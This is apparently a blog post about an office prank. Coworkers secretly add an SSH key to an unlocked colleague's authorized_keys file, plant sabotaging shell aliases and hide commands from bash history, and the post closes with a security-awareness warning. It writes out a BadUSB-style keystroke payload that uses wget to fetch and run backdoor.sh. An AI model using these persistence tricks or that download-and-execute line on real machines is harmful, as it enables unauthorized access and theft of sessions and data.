One of our office colleagues decided that it was fine to leave his laptop logged in and unattended whenever he went to the kitchen.  A few other colleagues and I saw a golden opportunity to make a tech prank. One day we quickly and surreptitiously added an ssh public key to his ~/.ssh/authorized_keys file. From that time on, we were able to find the IP address of his MacBook in our office local network and, using the ssh prompt, make his laptop do just about anything. 

There were probably already a lot of established security pranks we could have used, but we decided to brainstorm some ideas ourselves over private messages.

Here’s the first thing we did:

 nano ~/.bashrc

The space at the beginning ensures that the command will not appear in the bash history.

And then, somewhere in the middle of the file, we added:

alias cd="sleep 2; cd"

Due to our sly coding, over the next month, every time our colleague used the console and changed the directory with a cd command, he was waiting an extra two seconds. He thought that something happened with a filesystem, but he did nothing to investigate further and did not attempt to fix it.

cd sleep prank

Then one day he asked, "Guys, do you know what might have happened with the change dir command on my Mac?" Another colleague claimed that there was a known issue introduced in some previous versions on Mac OS X. During the next couple of weeks, our poor prank victim checked for updates on his OS X every day.

We finally thought that it is time to disclose our plot and explain that the alias was created in some hidden file (which was fake information). We told him he needed to delete it using the rm command.

Of course, before telling him this, we logged in via SSH and added another alias:

alias rm="find /usr & rm"

We then gathered near his laptop and told him to delete our "malicious hidden alias file" by entering:

rm ~/.alias_file

He pressed Enter, and... Thought that rm was removing all his system files:

rm prank

He noticed the /usr/bin/x files and did Ctrl+C to cancel the command and stop the deletion. But the find command was executed in the background because we happened to put an ampersand (&) after it. Thus, it was impossible to cancel the command with Ctrl+C.

Though there is a way to stop such commands - you can press fg Ctrl+C

How dare we? It is immoral!

When you leave your work hardware unlocked in a public place or open-space office, you become subject to various attacks, which might have far worse consequences than the ones our colleague experienced. Actually, his data was not affected at all.

There have been many cases where temporarily-employed staff (cleaners or contracts) have carefully inserted USB Dongles, which had keyboard controller implementation instead of mass storage, and simulated keystrokes: 

CTRL + ALT + T wget https://example.com/backdoor.sh && chmod +x backdoor.sh && bash backdoor.sh ENTER exit ENTER

This can be executed within a second, and then the USB dongle can be ejected. No one will notice. The camera in the room will not "see" a cleaner touching the keyboard. This backdoor script can connect to a hacker-owned server and proxy any commands and outputs via ssh. Then they can just clone your cookies and let themselves log in to any website, taking money from you or your company’s account.

The sooner you understand that only you can take care of your security, the lesser the probability you will become a victim.

care about security

#security #prank